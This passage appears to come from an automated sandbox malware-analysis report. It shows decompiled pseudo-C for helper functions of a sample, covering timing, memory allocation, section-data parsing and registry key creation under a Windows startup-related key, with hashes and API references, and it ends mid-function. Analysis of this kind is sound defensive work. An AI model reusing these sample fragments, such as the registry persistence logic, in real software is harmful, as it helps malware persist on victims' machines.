Instruction ID: 6b12d8fa9abb3f50af95dda4d4c838ff80279442fd88766d5863b2d11682fbf7
Opcode Fuzzy Hash: 8495cd50054650cf41fc74a5323acae5ec194c39f9e6dcecfac656380566e7d3
Instruction Fuzzy Hash: A7E0127910020AAFCF115F65E94DD9D7F79EBD4351B100426F98182234DF379564DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01035B4E Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 158
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01035B4E(char __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v76;
				char _v100;
				char _v108;
				char _v148;
				void* _t89;
				void* _t100;
				void* _t104;
				void* _t108;
				void* _t112;
				intOrPtr* _t134;
				char _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				void* _t197;

				_t197 = __eflags;
				_t183 = __ecx;
				_v8 = __ecx;
				Sleep(0x1f4); // executed
				E0104196E( &_v100, _t197);
				E01041865( &_v100, E01043323( &_v100)); // executed
				_t89 = E010334D1( &_v12, ".bss"); // executed
				E010417D8( &_v100,  &_v148, _t89); // executed
				E01035FEB(_v12);
				E0103315E( &_v16,  &_v108);
				E01032FCE(_t183 + 0x4c,  &_v16);
				E01033148( &_v16);
				E01035AAE(_t183,  &_v24);
				_t134 = _v24;
				_t192 =  *_t134;
				_t100 = E01043441(_t134 + 4, _t192); // executed
				E01033549(_t183 + 0x10, _t100); // executed
				E01035FEB(_v12);
				_t20 = _t192 + 4; // 0x76b30774
				_t184 = _t20;
				 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_t134 + _t184));
				_t193 =  *((intOrPtr*)(_t134 + _t184 + 4));
				_t185 = _t184 + 8;
				_t104 = E01043441(_t134 + _t185, _t193);
				_t28 = _v8 + 0x28; // 0x868fffe
				E01033549(_t28, _t104);
				E01035FEB(_v12);
				_t186 = _t185 + _t193;
				 *((intOrPtr*)(_v8 + 0x18)) =  *((char*)(_t134 + _t186));
				_t194 =  *((intOrPtr*)(_t134 + _t186 + 1));
				_t187 = _t186 + 5;
				_t108 = E01043441(_t134 + _t187, _t194);
				_t38 = _v8 + 0x1c; // 0x8c8d5034
				E01033549(_t38, _t108);
				E01035FEB(_v12);
				_t188 = _t187 + _t194;
				 *((intOrPtr*)(_v8 + 0x20)) =  *((char*)(_t134 + _t188));
				_t195 =  *((intOrPtr*)(_t134 + _t188 + 1));
				_t189 = _t188 + 5;
				_t112 = E01043441(_t134 + _t189, _t195);
				_t48 = _v8 + 0x24; // 0xf9a8e800
				E01033549(_t48, _t112);
				E01035FEB(_v12);
				_t190 = _t189 + _t195;
				_t196 = _v8;
				 *((intOrPtr*)(_t196 + 0x2c)) =  *((intOrPtr*)(_t134 + _t190));
				 *((intOrPtr*)(_t196 + 0x34)) =  *((char*)(_t134 + _t190 + 4));
				 *((intOrPtr*)(_t196 + 0x38)) =  *((char*)(_t134 + _t190 + 5));
				 *((intOrPtr*)(_t196 + 0x3c)) =  *((char*)(_t134 + _t190 + 6));
				 *((intOrPtr*)(_t196 + 0x40)) =  *((char*)(_t134 + _t190 + 7));
				 *((intOrPtr*)(_t196 + 0x44)) =  *((char*)(_t134 + _t190 + 8));
				 *((intOrPtr*)(_t196 + 0x48)) =  *((char*)(_t134 + _t190 + 9));
				E01043441(_t134 + 4 + _t190 + 0xa,  *((intOrPtr*)(_t134 + _t190 + 0xa))); // executed
				_t75 = _t196 + 0x30; // 0x104565e, executed
				E01033549(_t75,  &_v8); // executed
				 *_t196 = 1;
				 *((intOrPtr*)(_t196 + 4)) = 1;
				E01035FEB(_v8);
				E01033148( &_v24);
				E01033148( &_v108);
				_t173 = _v56;
				if(_v56 != 0) {
					E01031EB2(_t173, _t173);
				}
				_v56 = 0;
				_v48 = 0;
				_v52 = 0;
				E01033148( &_v76);
				return E0104140C( &_v100, 0);
			}

0x01035b4e
0x01035b5a
0x01035b61
0x01035b64
0x01035b6d
0x01035b7b
0x01035b88
0x01035b98
0x01035ba0
0x01035bac
0x01035bb8
0x01035bc0
0x01035bcb
0x01035bd0
0x01035bd6
0x01035bdc
0x01035be6
0x01035bee
0x01035bf6
0x01035bf6
0x01035bfc
0x01035c02
0x01035c06
0x01035c0d
0x01035c17
0x01035c1a
0x01035c22
0x01035c2a
0x01035c30
0x01035c36
0x01035c3a
0x01035c41
0x01035c4b
0x01035c4e
0x01035c56
0x01035c5e
0x01035c64
0x01035c6a
0x01035c6e
0x01035c75
0x01035c7f
0x01035c82
0x01035c8a
0x01035c8f
0x01035c94
0x01035c9d
0x01035ca5
0x01035cad
0x01035cb5
0x01035cbd
0x01035cc5
0x01035cd0
0x01035cd8
0x01035ce2
0x01035ce5
0x01035cf0
0x01035cf2
0x01035cf5
0x01035cfd
0x01035d05
0x01035d0a
0x01035d0f
0x01035d12
0x01035d12
0x01035d1c
0x01035d1f
0x01035d22
0x01035d25
0x01035d36

APIs

Sleep.KERNEL32(000001F4,00000000,76B30770,00000000), ref: 01035B64

Part of subcall function 010334D1: lstrlenA.KERNEL32(?,76B30770,?,01035B8D,.bss,00000000), ref: 010334DA
Part of subcall function 010334D1: lstrlenA.KERNEL32(?,?,01035B8D,.bss,00000000), ref: 010334E7
Part of subcall function 010334D1: lstrcpyA.KERNEL32(00000000,?,?,01035B8D,.bss,00000000), ref: 010334FA

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Strings

.bss, xrefs: 01035B80

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$FreeSleepVirtual
String ID: .bss
API String ID: 277671435-3890483948
Opcode ID: 009d5de8b7d37af02a077f2d1ff6f46c0524561ecedde61eaffdd36a77eb3d6a
Instruction ID: db2934147f84b69b7edf0502c909cd1f79c118618114e08c48614e02af9ec72f
Opcode Fuzzy Hash: 009d5de8b7d37af02a077f2d1ff6f46c0524561ecedde61eaffdd36a77eb3d6a
Instruction Fuzzy Hash: 6F51827590511AEFCB15EFA1C8D08EEB7B9BFA4304B1041B9D496AB255EF30BB41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01033666 Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E01033666(short** __ecx, intOrPtr _a4) {
				short** _v8;
				char* _t12;
				void* _t15;
				int _t35;
				short** _t36;

				_push(__ecx);
				_v8 = __ecx;
				E010332D5(_a4);
				if( *__ecx != 0) {
					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E01033373(__ecx), 0, 0, 0, 0);
					_t12 = E01035FFA(_t35);
					_t36 = _v8;
					_t22 = _t12;
					WideCharToMultiByte(0xfde9, 0,  *_t36, E01033373(_t36), _t12, _t35, 0, 0);
					_t15 = E010334D1( &_v8, _t22); // executed
					E01033237(_a4, _t15); // executed
					E01035FEB(_v8);
					E01035FEB(_t22);
				}
				return _a4;
			}

0x01033669
0x01033671
0x01033674
0x0103367d
0x01033699
0x0103369d
0x010336a7
0x010336aa
0x010336be
0x010336c8
0x010336d1
0x010336d9
0x010336e0
0x010336e0
0x010336eb

APIs

Part of subcall function 01033373: lstrlenW.KERNEL32(76B30770,01033758,?,?,?,01042AE3,0104566F,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,0104563F,00000000,76B30770,00000000), ref: 0103337A

WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,01034FB1,?), ref: 01033693

Part of subcall function 01035FFA: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,01033764,?,?,?,01042AE3,0104566F,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,0104563F,00000000,76B30770,00000000), ref: 01036004

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,01034FB1,?,?,?,?,?,00000000), ref: 010336BE

Part of subcall function 010334D1: lstrlenA.KERNEL32(?,76B30770,?,01035B8D,.bss,00000000), ref: 010334DA
Part of subcall function 010334D1: lstrlenA.KERNEL32(?,?,01035B8D,.bss,00000000), ref: 010334E7
Part of subcall function 010334D1: lstrcpyA.KERNEL32(00000000,?,?,01035B8D,.bss,00000000), ref: 010334FA

Part of subcall function 01033237: lstrcatA.KERNEL32(00000000,76B30770,?,00000000,?,010336D6,00000000,00000000,?,01034FB1,?,?,?,?,?,00000000), ref: 01033263

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
String ID:
API String ID: 346377423-0
Opcode ID: 826395a995391ef76b64558d07781f0c8894345fad83982b596e3fe3674ce9fb
Instruction ID: 9b6addf15bacfa7246efa26d600359d1238a285ea575e1e148d9c5f0860b5f33
Opcode Fuzzy Hash: 826395a995391ef76b64558d07781f0c8894345fad83982b596e3fe3674ce9fb
Instruction Fuzzy Hash: 5701D875301221BBDB15ABA4CCC5FEE769DAF99610F100025B942AB290CE745E00C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 01042612 Relevance: 3.0, APIs: 2, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01042612(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
				long _t10;
				short** _t22;
				void** _t23;

				_t23 = __ecx;
				_t22 = _a8;
				if(_a16 == 0 || E01040C50(_a4, _t22) != 0) {
					L4:
					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
					if(_t10 != 0) {
						goto L6;
					}
					return _t10 + 1;
				} else {
					_a16 = 0;
					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
						L6:
						return 0;
					}
					E01042554(_t23);
					goto L4;
				}
			}

0x01042619
0x0104261c
0x01042622
0x01042657
0x01042661
0x01042669
0x00000000
0x00000000
0x00000000
0x01042632
0x01042635
0x0104264e
0x0104266e
0x00000000
0x0104266e
0x01042652
0x00000000
0x01042652

APIs

RegOpenKeyExW.KERNEL32(76B30770,00000000,00000000,0104563F,?,?,?,0104563F,?,01042B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 01042661

Part of subcall function 01040C50: RegOpenKeyExW.ADVAPI32(76B30770,00000000,00000000,00020019,00000000,76B30770,?,0104262E,?,?,0104563F,?,01042B64,80000001,?,000F003F), ref: 01040C66

RegCreateKeyExW.ADVAPI32(76B30770,00000000,00000000,00000000,00000000,0104563F,00000000,?,?,?,?,0104563F,?,01042B64,80000001,?), ref: 01042646

Part of subcall function 01042554: RegCloseKey.KERNEL32(?,?,010426D3,?,?,0104577A), ref: 0104255E

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Open$CloseCreate
String ID:
API String ID: 1752019758-0
Opcode ID: 6c46b176d4c55ede755f6ae68cf4529624af77f8b71f1f64650241585fbe9f2e
Instruction ID: bddd30e94a4248543d513de2c6315e70030f6312abcefcf8a949f3fd60197fee
Opcode Fuzzy Hash: 6c46b176d4c55ede755f6ae68cf4529624af77f8b71f1f64650241585fbe9f2e
Instruction Fuzzy Hash: CC0169B520020EBFAB128E65ECC4CBF7BADEF48298B00403AF94591110E7328D619AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0104338D Relevance: 3.0, APIs: 2, Instructions: 14
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0104338D(signed int _a4) {

				Sleep(1); // executed
				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
			}

0x01043392
0x010433b5

APIs

Sleep.KERNEL32(00000001), ref: 01043392
GetTickCount.KERNEL32 ref: 01043398

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CountSleepTick
String ID:
API String ID: 2804873075-0
Opcode ID: ba2f3597cef1c1c6e8e18a93934e97c1ae37391bd5c1762dc39a4d77bae8f3ba
Instruction ID: f363d116025a2e1ef8717848806764848268657ff3f5329a9c6fc2213b0d2ad2
Opcode Fuzzy Hash: ba2f3597cef1c1c6e8e18a93934e97c1ae37391bd5c1762dc39a4d77bae8f3ba
Instruction Fuzzy Hash: 25D022B03581048FE30C9A1DFD9E2213A4FD7C1305F00C02BF34EC90E0CAB694518680

Uniqueness

Uniqueness Score: -1.00%

Function 010417A2 Relevance: 3.0, APIs: 2, Instructions: 8
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010417A2(void** __ecx) {
				int _t2;
				void** _t4;

				_t4 = __ecx;
				ReleaseMutex( *__ecx);
				_t2 = FindCloseChangeNotification( *_t4); // executed
				return _t2;
			}

0x010417a3
0x010417a7
0x010417af
0x010417b6

APIs

ReleaseMutex.KERNEL32(?,?,0104141C,0104562E,01035D32,0104562E,00000000,00000000,00000000,00000000,?,?,?,?,00000000,.bss), ref: 010417A7
FindCloseChangeNotification.KERNEL32(?), ref: 010417AF

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindMutexNotificationRelease
String ID:
API String ID: 4264517613-0
Opcode ID: ee7b31a3b45d3a7d93e11b69435cb240e4fa6b9f2a2c7ecbe45caabd1cd449c6
Instruction ID: 81af17b81df89a185db10d591354501506c4e8d7059d61e1b9fe030918efb2ed
Opcode Fuzzy Hash: ee7b31a3b45d3a7d93e11b69435cb240e4fa6b9f2a2c7ecbe45caabd1cd449c6
Instruction Fuzzy Hash: A9B092BE002060EFEB322F18FE4C8C4BBA6EF49251311446AF1C18103C8BB70C549B90

Uniqueness

Uniqueness Score: -1.00%

Function 01036045 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01036045(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
				return _t2;
			}

0x0103604f
0x01036055

APIs

GetProcessHeap.KERNEL32(00000008,?,010330E2,01035B80,?,?,0104191C,01035B80,?,?,76B30770,00000000,?,01035B80,00000000), ref: 01036048
RtlAllocateHeap.NTDLL(00000000,?,0104191C,01035B80,?,?,76B30770,00000000,?,01035B80,00000000), ref: 0103604F

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 3258b573f9e5f9fb1581b133582ef969973e6e23c5827c59591d965ee3bdad8b
Instruction ID: cb5154b90ce983657ad0ca16b05ad315523d32fe6d2a585f7c55b6baffbc783e
Opcode Fuzzy Hash: 3258b573f9e5f9fb1581b133582ef969973e6e23c5827c59591d965ee3bdad8b
Instruction Fuzzy Hash: E1A002F55501005BDE6467B49B4DF153619B744701F0445447585C50549B6D54448771

Uniqueness

Uniqueness Score: -1.00%

Function 01031085 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01031085(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				return _t3;
			}

0x01031092
0x01031098

APIs

GetProcessHeap.KERNEL32(00000000,?,010434B7,00400000,?,?,00000000,?,?,01045553), ref: 0103108B
RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,01045553), ref: 01031092

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: b5c6577299bbb76170f115ae602492e42fe35b692088173d639d97433a29b9e6
Instruction ID: d98ad5156ba887e31a8c1ea69e2b9c6c5da554451bcea2173f48f9a3f5928ff2
Opcode Fuzzy Hash: b5c6577299bbb76170f115ae602492e42fe35b692088173d639d97433a29b9e6
Instruction Fuzzy Hash: 99B002B9554200ABDF616BF09B4DF197B65BB44702F044944F685C5054C77E4450DB71

Uniqueness

Uniqueness Score: -1.00%

Function 010331AF Relevance: 2.6, APIs: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E010331AF(char** __ecx, void* __eflags, intOrPtr* _a4) {
				char** _v8;
				short* _t15;
				void* _t19;
				int _t39;

				_push(__ecx);
				_v8 = __ecx;
				 *_a4 = 0;
				if(E0103319E(__ecx) > 0) {
					_t39 = MultiByteToWideChar(0, 2,  *__ecx, E0103319E(__ecx) + 2, 0, 0) + _t14;
					_t15 = E01035F68(_t39);
					_t26 = _t15;
					E0103319E(_v8);
					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39);
					_t19 = E010336F7( &_v8, _t15); // executed
					E01033549(_a4, _t19); // executed
					E01035FEB(_v8);
					E01035FEB(_t26);
				}
				return _a4;
			}

0x010331b2
0x010331bc
0x010331bf
0x010331c8
0x010331e4
0x010331e8
0x010331f0
0x010331f2
0x01033207
0x01033211
0x0103321a
0x01033222
0x01033229
0x01033229
0x01033234

APIs

Part of subcall function 0103319E: lstrlenA.KERNEL32(00000000,010331C6,76B30770,00000000,00000000,?,010333EE,01033620,00000000,-00000001,76B30770,?,01033620,00000000,?,?), ref: 010331A5

MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,76B30770,00000000,00000000,?,010333EE,01033620,00000000,-00000001,76B30770), ref: 010331DC

Part of subcall function 01035F68: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,010334F4,?,01035B8D,.bss,00000000), ref: 01035F76

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,010333EE,01033620,00000000,-00000001,76B30770,?,01033620,00000000), ref: 01033207

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiVirtualWide$AllocDispatcherExceptionFreeUserlstrcpy
String ID:
API String ID: 2128046513-0
Opcode ID: 7e163be277b9a2988a747e13f02d30ebcfad8ee600ce8146f0aefcbdd2366d27
Instruction ID: 84807fb7fc82a202485296237b33e08b2fdbf26cb0a5075dcf3de1864a8224da
Opcode Fuzzy Hash: 7e163be277b9a2988a747e13f02d30ebcfad8ee600ce8146f0aefcbdd2366d27
Instruction Fuzzy Hash: 3401B171600115BBCB24EBA9CDD5EDE37ADAF99650B000065F942DF2A0CB748E00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 010409A0 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E010409A0() {
				char _v8;
				void* __ecx;
				WCHAR* _t3;
				void* _t5;
				signed int* _t10;
				long _t15;
				signed int* _t16;
				intOrPtr* _t21;

				_push(_t10);
				_t16 = _t10;
				_t3 = E01031085(0x7d0);
				 *_t16 =  *_t16 & 0x00000000;
				_t19 = _t3;
				 *_t21 = 0x3e8;
				GetModuleFileNameW(0, _t3, _t15);
				_t5 = E010336F7( &_v8, _t19); // executed
				E01033549(_t16, _t5); // executed
				E01035FEB(_v8);
				E01031099(_t19);
				return _t16;
			}

0x010409a3
0x010409ab
0x010409ad
0x010409b2
0x010409b5
0x010409b7
0x010409c1
0x010409cb
0x010409d3
0x010409db
0x010409e1
0x010409ec

APIs

Part of subcall function 01031085: GetProcessHeap.KERNEL32(00000000,?,010434B7,00400000,?,?,00000000,?,?,01045553), ref: 0103108B
Part of subcall function 01031085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,01045553), ref: 01031092

GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,0104563F,?,01042BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 010409C1

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 01031099: GetProcessHeap.KERNEL32(00000000,00000000,01043499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0103109F
Part of subcall function 01031099: HeapFree.KERNEL32(00000000), ref: 010310A6

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcesslstrlen$AllocateDispatcherExceptionFileModuleNameUserVirtuallstrcpy
String ID:
API String ID: 3831115454-0
Opcode ID: 58d9e44da7ecfd596965431fefe1f52911216843c3082f6e9f2e5d9b81373695
Instruction ID: f7d9bf9bd913c76c543e60511dfee64f4baa3d538a139db59da59a47e8d595b2
Opcode Fuzzy Hash: 58d9e44da7ecfd596965431fefe1f52911216843c3082f6e9f2e5d9b81373695
Instruction Fuzzy Hash: AFE092727042116BD314B766EC56FEF77ADDFE5262F000019F185962D0DFB45A00C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 01042514 Relevance: 1.5, APIs: 1, Instructions: 28
registryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E01042514(void** __ecx, short** _a8) {
				int _v8;
				signed int _t8;

				_push(__ecx);
				_v8 = 0;
				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed
				if(_t8 != 0) {
					return 0;
				}
				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1;
			}

0x01042517
0x0104252c
0x01042534
0x0104253d
0x00000000
